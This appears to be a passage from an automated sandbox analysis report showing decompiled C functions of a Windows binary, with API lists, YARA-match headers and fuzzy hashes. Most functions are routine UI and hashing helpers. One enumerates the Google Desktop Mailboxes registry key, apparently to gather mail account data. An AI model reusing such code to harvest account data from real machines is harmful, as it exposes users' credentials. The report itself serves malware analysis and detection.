				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040F276(_v268, 0,  &_v260);
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;
						}
						_t24 = E0040F1B0(_v268,  &_v260,  &_v264);
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E004071D6(_t29, _a4, _v264,  &_v260);
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040F276(_v268, _t32,  &_v260);
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

















                                                                                                                                                                  0x00407306
                                                                                                                                                                  0x00407323
                                                                                                                                                                  0x00407328
                                                                                                                                                                  0x0040732d
                                                                                                                                                                  0x00407334
                                                                                                                                                                  0x0040733c
                                                                                                                                                                  0x00407341
                                                                                                                                                                  0x00407346
                                                                                                                                                                  0x00407353
                                                                                                                                                                  0x004073a1
                                                                                                                                                                  0x004073a1
                                                                                                                                                                  0x004073a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040736e
                                                                                                                                                                  0x00407373
                                                                                                                                                                  0x00407378
                                                                                                                                                                  0x00407386
                                                                                                                                                                  0x0040738f
                                                                                                                                                                  0x0040738f
                                                                                                                                                                  0x00407396
                                                                                                                                                                  0x0040739c
                                                                                                                                                                  0x0040739c
                                                                                                                                                                  0x004073ac
                                                                                                                                                                  0x004073ac
                                                                                                                                                                  0x004073b3

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  • memset.MSVCRT ref: 00407341
                                                                                                                                                                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 0040738F
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004073AC
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00407319
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$EnumOpenmemset
                                                                                                                                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                  • API String ID: 2255314230-2212045309
                                                                                                                                                                  • Opcode ID: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
                                                                                                                                                                  • Instruction ID: e64120c2db1572d8afbfe90730df88552d052729858ffd3f9c459fe70d1883dc
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
                                                                                                                                                                  • Instruction Fuzzy Hash: FE114F72808345BBD720EA52DC02EAB7BECEB84344F04493EBD94D1191E735DA1CDAA7
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AECD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040AECD(void* __ebx, void* __eflags) {
				char _v265;
				char _v526;
				char _v787;
				void _v1048;
				void _v3648;
				intOrPtr _v3652;
				char _v3660;
				void* _t30;

				_t30 = __ebx;
				_v3660 = 0x414040;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				_t12 =  &_v3660; // 0x414040
				if(E00401540(_t12,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AEB7(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				_t18 =  &_v3660; // 0x414040
				return E004013E7(_t18);
			}











                                                                                                                                                                  0x0040aecd
                                                                                                                                                                  0x0040aee3
                                                                                                                                                                  0x0040aeed
                                                                                                                                                                  0x0040af01
                                                                                                                                                                  0x0040af08
                                                                                                                                                                  0x0040af0f
                                                                                                                                                                  0x0040af16
                                                                                                                                                                  0x0040af1d
                                                                                                                                                                  0x0040af38
                                                                                                                                                                  0x0040af3a
                                                                                                                                                                  0x0040af47
                                                                                                                                                                  0x0040af64
                                                                                                                                                                  0x0040af64
                                                                                                                                                                  0x0040af75
                                                                                                                                                                  0x0040af7b
                                                                                                                                                                  0x0040af89

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040AEED
                                                                                                                                                                  • SetFocus.USER32(?,?), ref: 0040AF75
                                                                                                                                                                    • Part of subcall function 0040AEB7: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040AEC6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FocusMessagePostmemset
                                                                                                                                                                  • String ID: @@A$l
                                                                                                                                                                  • API String ID: 3436799508-3245464651
                                                                                                                                                                  • Opcode ID: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
                                                                                                                                                                  • Instruction ID: b134d5c547a061a2024b59ce6a2071751047cb74c3ab3f5c012b8dbc43773ba7
                                                                                                                                                                  • Opcode Fuzzy Hash: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
                                                                                                                                                                  • Instruction Fuzzy Hash: E511A5719001588BDF21DB15CD457CB7BA9AF40308F0800F5A94C7B282C7B55A89CFA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004085AB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004085AB(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}












                                                                                                                                                                  0x004085ab
                                                                                                                                                                  0x004085b3
                                                                                                                                                                  0x004085b8
                                                                                                                                                                  0x004085c4
                                                                                                                                                                  0x004085cf
                                                                                                                                                                  0x004085d1
                                                                                                                                                                  0x004085d3
                                                                                                                                                                  0x004085d7
                                                                                                                                                                  0x004085db
                                                                                                                                                                  0x004085eb
                                                                                                                                                                  0x004085f2
                                                                                                                                                                  0x004085fa
                                                                                                                                                                  0x00408600
                                                                                                                                                                  0x00408603
                                                                                                                                                                  0x00408607
                                                                                                                                                                  0x00408607
                                                                                                                                                                  0x0040860b
                                                                                                                                                                  0x0040860c
                                                                                                                                                                  0x004085d1
                                                                                                                                                                  0x004085cf
                                                                                                                                                                  0x00408614

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendmemset
                                                                                                                                                                  • String ID: "$\LA
                                                                                                                                                                  • API String ID: 568519121-1791104459
                                                                                                                                                                  • Opcode ID: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                                                                                                                                                                  • Instruction ID: 63acc278c780c6314b896fe9ea96fe6fcbd724764764ef8c6808a121558323c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                                                                                                                                                                  • Instruction Fuzzy Hash: 6401D635900204AFDB20DF45CA81AABB7F8FF84749F11842EE891A7241E7359E95CB79
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406647, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00406647(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				_v20 = 0x41403c;
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;
				} else {
					strcpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                                                                  0x0040664d
                                                                                                                                                                  0x00406653
                                                                                                                                                                  0x00406658
                                                                                                                                                                  0x0040665b
                                                                                                                                                                  0x0040665e
                                                                                                                                                                  0x00406664
                                                                                                                                                                  0x0040666b
                                                                                                                                                                  0x00406672
                                                                                                                                                                  0x00406679
                                                                                                                                                                  0x0040667c
                                                                                                                                                                  0x00406683
                                                                                                                                                                  0x0040668a
                                                                                                                                                                  0x00406699
                                                                                                                                                                  0x004066ae
                                                                                                                                                                  0x0040669b
                                                                                                                                                                  0x0040669f
                                                                                                                                                                  0x004066aa
                                                                                                                                                                  0x004066aa

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileNameOpenstrcpy
                                                                                                                                                                  • String ID: L$ini
                                                                                                                                                                  • API String ID: 812585365-4234614086
                                                                                                                                                                  • Opcode ID: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                                                                                                                                                                  • Instruction ID: 37832acc40b05216fd1420d9404962ea4abb69311e967ef4bad7b399ffdc39fa
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                                                                                                                                                                  • Instruction Fuzzy Hash: 9001BDB1D102189FCF50DFA9D9456CEBFF8BB08348F00812AE519E6240EBB885458F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401000, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00401000(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E0040619B( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x418388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}






                                                                                                                                                                  0x00401013
                                                                                                                                                                  0x0040101f
                                                                                                                                                                  0x00401038
                                                                                                                                                                  0x0040103e
                                                                                                                                                                  0x00401047
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040105b
                                                                                                                                                                  0x0040105f

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                                                                                                                                                                    • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                                                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                                                  • API String ID: 4251605573-168460110
                                                                                                                                                                  • Opcode ID: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                                                                                                                                                                  • Instruction ID: 87dec32cde48cbcf1a13d2850fc5ac8412a7d38377e852ebd334ba5dd6d4256f
                                                                                                                                                                  • Opcode Fuzzy Hash: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                                                                                                                                                                  • Instruction Fuzzy Hash: 0DF0A771B4030877EB216BA0EC4BF8A7BACAB41F01F148535FA51B51E1D6F5B644CB48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004062DB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E004062DB(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				_push("edit");
				_push(_t10);
				L00412072();
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                                                                                                                                                  0x004062f4
                                                                                                                                                                  0x004062fb
                                                                                                                                                                  0x0040630e
                                                                                                                                                                  0x00406314
                                                                                                                                                                  0x0040631a
                                                                                                                                                                  0x0040631f
                                                                                                                                                                  0x00406320
                                                                                                                                                                  0x00406329
                                                                                                                                                                  0x0040632e

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004062FB
                                                                                                                                                                  • GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,edit), ref: 00406320
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName_stricmpmemset
                                                                                                                                                                  • String ID: edit
                                                                                                                                                                  • API String ID: 3665161774-2167791130
                                                                                                                                                                  • Opcode ID: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
                                                                                                                                                                  • Instruction ID: f5117061f2ecbf32e0f2d844d8c4f3ebb38ffa703039f8d1d2413de036cb48d9
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BE09B72C4412A7EDB21A664EC01FE63BAC9F19705F0001B6B945E1081E6A497C48AA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F41D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040F41D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x418520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x418520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41851c = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                                  0x0040f424
                                                                                                                                                                  0x0040f42b
                                                                                                                                                                  0x0040f433
                                                                                                                                                                  0x0040f438
                                                                                                                                                                  0x0040f440
                                                                                                                                                                  0x0040f446
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f446
                                                                                                                                                                  0x0040f438
                                                                                                                                                                  0x0040f44b

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76D24DE0,?,00000000), ref: 0040F42B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                  • API String ID: 2574300362-543337301
                                                                                                                                                                  • Opcode ID: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
                                                                                                                                                                  • Instruction ID: f6b0fe8b92f076911ecc5568a6e4330759afce426f86003319557fe493e3cfe8
                                                                                                                                                                  • Opcode Fuzzy Hash: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
                                                                                                                                                                  • Instruction Fuzzy Hash: 59D092B0642202ABD7208F21AC097827AAAE798706F01C53AA800E12A4FF7895448A5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004104AE, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E004104AE(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x415314;
				_t27 = E00406578(0x46c, __esi);
				_push(0x20);
				L00412090();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A5B(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L00412090();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A5B(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}







                                                                                                                                                                  0x004104ae
                                                                                                                                                                  0x004104b6
                                                                                                                                                                  0x004104bc
                                                                                                                                                                  0x004104c1
                                                                                                                                                                  0x004104c3
                                                                                                                                                                  0x004104ce
                                                                                                                                                                  0x004104d7
                                                                                                                                                                  0x004104d0
                                                                                                                                                                  0x004104d0
                                                                                                                                                                  0x004104d0
                                                                                                                                                                  0x004104d9
                                                                                                                                                                  0x004104db
                                                                                                                                                                  0x004104e1
                                                                                                                                                                  0x004104e9
                                                                                                                                                                  0x004104f2
                                                                                                                                                                  0x004104eb
                                                                                                                                                                  0x004104eb
                                                                                                                                                                  0x004104eb
                                                                                                                                                                  0x004104f4
                                                                                                                                                                  0x004104f6
                                                                                                                                                                  0x004104fc
                                                                                                                                                                  0x00410509
                                                                                                                                                                  0x0041051b
                                                                                                                                                                  0x0041050b
                                                                                                                                                                  0x0041050b
                                                                                                                                                                  0x0041050e
                                                                                                                                                                  0x00410510
                                                                                                                                                                  0x00410513
                                                                                                                                                                  0x00410516
                                                                                                                                                                  0x00410516
                                                                                                                                                                  0x0041051d
                                                                                                                                                                  0x0041051f
                                                                                                                                                                  0x00410525
                                                                                                                                                                  0x0041052d
                                                                                                                                                                  0x0041053f
                                                                                                                                                                  0x0041052f
                                                                                                                                                                  0x0041052f
                                                                                                                                                                  0x00410532
                                                                                                                                                                  0x00410534
                                                                                                                                                                  0x00410537
                                                                                                                                                                  0x0041053a
                                                                                                                                                                  0x0041053a
                                                                                                                                                                  0x00410541
                                                                                                                                                                  0x00410543
                                                                                                                                                                  0x00410549
                                                                                                                                                                  0x00410551
                                                                                                                                                                  0x00410563
                                                                                                                                                                  0x00410553
                                                                                                                                                                  0x00410553
                                                                                                                                                                  0x00410556
                                                                                                                                                                  0x00410558
                                                                                                                                                                  0x0041055b
                                                                                                                                                                  0x0041055e
                                                                                                                                                                  0x0041055e
                                                                                                                                                                  0x0041056b
                                                                                                                                                                  0x00410576
                                                                                                                                                                  0x0041057f
                                                                                                                                                                  0x00410586
                                                                                                                                                                  0x00410589
                                                                                                                                                                  0x0041058c
                                                                                                                                                                  0x0041058f
                                                                                                                                                                  0x00410595

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                  • Opcode ID: 7bad43f24cb77abe56b588b58120f20ee9b42d559bc282368106ea24cb956e28
                                                                                                                                                                  • Instruction ID: e5f264b8724d3d475e9e13978f0762699e8b6218914c988ba7d238899ccfa6da
                                                                                                                                                                  • Opcode Fuzzy Hash: 7bad43f24cb77abe56b588b58120f20ee9b42d559bc282368106ea24cb956e28
                                                                                                                                                                  • Instruction Fuzzy Hash: 2431E8B0A007009FD750DF3A99856A6FBE5EF84305B25886FD25ACB262D7B8D481CF19
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004065B4, Relevance: 6.3, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E004065B4(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					sprintf( &_v260, 0x413470,  *(_t35 + _a4) & 0x000000ff);
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                                                                  0x004065b4
                                                                                                                                                                  0x004065cc
                                                                                                                                                                  0x004065d3
                                                                                                                                                                  0x004065d8
                                                                                                                                                                  0x004065db
                                                                                                                                                                  0x004065de
                                                                                                                                                                  0x004065e0
                                                                                                                                                                  0x004065f4
                                                                                                                                                                  0x004065f9
                                                                                                                                                                  0x004065fe
                                                                                                                                                                  0x00406606
                                                                                                                                                                  0x0040660c
                                                                                                                                                                  0x00406611
                                                                                                                                                                  0x00406615
                                                                                                                                                                  0x0040661b
                                                                                                                                                                  0x00406623
                                                                                                                                                                  0x00406629
                                                                                                                                                                  0x0040661b
                                                                                                                                                                  0x00406632
                                                                                                                                                                  0x00406637
                                                                                                                                                                  0x0040663f
                                                                                                                                                                  0x00406646

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcat$memsetsprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 582077193-0
                                                                                                                                                                  • Opcode ID: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                                                                                                                                                                  • Instruction ID: 9a6b28ef774d6e53ee32a9c0eecf57d77903bda120735f9d6ade06843e2f5b66
                                                                                                                                                                  • Opcode Fuzzy Hash: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                                                                                                                                                                  • Instruction Fuzzy Hash: 03014C32A042152AD73266569C02BEB3B9C9B58708F10817FF944E51C2EAFCD6D4879D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BEEC, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040BEEC(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BF6B(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BF6B(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                                                                                                                                                  0x0040beec
                                                                                                                                                                  0x0040bef4
                                                                                                                                                                  0x0040bef5
                                                                                                                                                                  0x0040bef7
